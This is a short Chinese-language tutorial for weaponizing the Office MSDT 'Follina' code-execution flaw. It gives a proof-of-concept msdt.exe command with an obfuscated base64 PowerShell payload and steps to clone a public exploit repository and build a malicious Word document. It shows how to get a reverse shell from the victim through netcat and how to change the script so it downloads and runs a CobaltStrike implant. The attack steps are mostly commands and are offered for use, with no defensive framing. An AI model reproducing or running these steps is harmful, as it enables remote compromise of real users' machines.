前言
利用Office的疑难解答程序漏洞实现打开文档后命令执行漏洞利用
漏洞利用前提
- Microsoft Office 2021 LTS
- Microsoft Office 2019
- Microsoft Office 2016
- Microsoft Office 2013
- Microsoft Office ProPlus
- Microsoft Office 365
poc
1
| msdt.exe /id PCWDiagnostic /skip force /param "IT_RebrowseForFile=? IT_LaunchMethod=ContextMenu IT_BrowseForFile=$(Invoke-Expression($(Invoke-Expression('[System.Text.Encoding]'+[char]58+[char]58+'Unicode.GetString([System.Convert]'+[char]58+[char]58+'FromBase64String('+[char]34+'YwBhAGwAYwA='+[char]34+'))'))))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe"
|
下载项目
1
2
| git clone https://github.com/JohnHammond/msdt-follina.git
cd msdt-follina
|
反弹Shell到nc
攻击者生成包含恶意代码的Word文件
-i <ip>:指定攻击者IP地址
-p <port>:指定攻击者端口号,没有指定默认为8000
-r <port>:指定攻击者反弹Shell监听的端口号,指定这个参数后会自动开启反弹Shell监听
1
| python3 follina.py -i <ip>
|
- 生成包含恶意代码的Word文件
follina.doc
受害者反弹Shell
反弹Shell到其他远控
反弹Shell到CobaltStrike
准备工作
修改代码
- 修改文件
follina.py第111行
- 将
https://github.com/JohnHammond/msdt-follina/blob/main/nc64.exe?raw=true请求URL修改为CobaltStrike生成的木马
- 将
C:\\Windows\\Tasks\\nc.exe保存的文件名更名
- 将
C:\\Windows\\Tasks\\nc.exe -e cmd.exe {serve_host} {args.reverse}程序执行命令修改为CobaltStrike生成的木马
1
| command = f"""Invoke-WebRequest http://127.0.0.1:80/download/artifact.exe -OutFile C:\\Windows\\Temp\\artifact.exe; C:\\Windows\\Temp\\artifact.exe"""
|
攻击者生成包含恶意代码的Word文件
-i <ip>:指定攻击者IP地址
-p <port>:指定CobaltStrike生成木马时指定的端口号
1
| python3 follina.py -i <ip> -p <port>
|
受害者反弹Shell
完成